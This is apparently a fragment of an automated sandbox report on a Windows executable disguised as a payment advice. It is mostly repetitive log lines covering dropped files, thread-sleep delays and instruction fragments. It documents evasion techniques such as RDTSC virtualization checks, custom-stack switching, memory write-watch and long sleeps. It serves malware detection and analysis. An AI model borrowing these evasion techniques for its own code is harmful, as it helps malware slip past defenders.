Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C48928 push es; ret 2_2_36C4892A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB660B pushad ; retf 2_2_36CB660E
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6609 pushad ; retf 2_2_36CB660A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6603 pushad ; retf 2_2_36CB6606
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0023 push esp; ret 2_2_36CB0036
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0DE0 pushad ; ret 2_2_36CB0DE2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB65FB pushad ; retf 2_2_36CB6602
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBDDF3 pushfd ; rep ret 2_2_36CBDDF5
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1B91 push 68B836C3h; ret 2_2_36CB1B9A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1703 push esp; ret 2_2_36CB1705
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF637B push ebp; retf 0036h 2_2_36CF6382
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D35ED5 push edi; iretd 2_2_36D35ED6
Drops PE files
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Temp\nsj38E6.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API/Special instruction interceptor: Address: 43B0B34
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API/Special instruction interceptor: Address: 2EF0B34
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe RDTSC instruction interceptor: First address: 434344B second address: 434344B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F12E933F167h 0x00000006 cld 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 cmp dl, al 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe RDTSC instruction interceptor: First address: 2E8344B second address: 2E8344B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F12E87D71D7h 0x00000006 cld 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 cmp dl, al 0x0000000b rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 339C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 359C0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599322 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597567 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596796 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595248 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594670 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594562 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Window / User API: threadDelayed 7667 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Window / User API: threadDelayed 2187 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj38E6.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API coverage: 2.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5304 Thread sleep count: 7667 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5304 Thread sleep count: 2187 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599322s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597567s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595248s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594670s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00402868 FindFirstFileW, 2_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004065DA FindFirstFileW,FindClose, 2_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 2_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599322 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598671 Jump to behavior
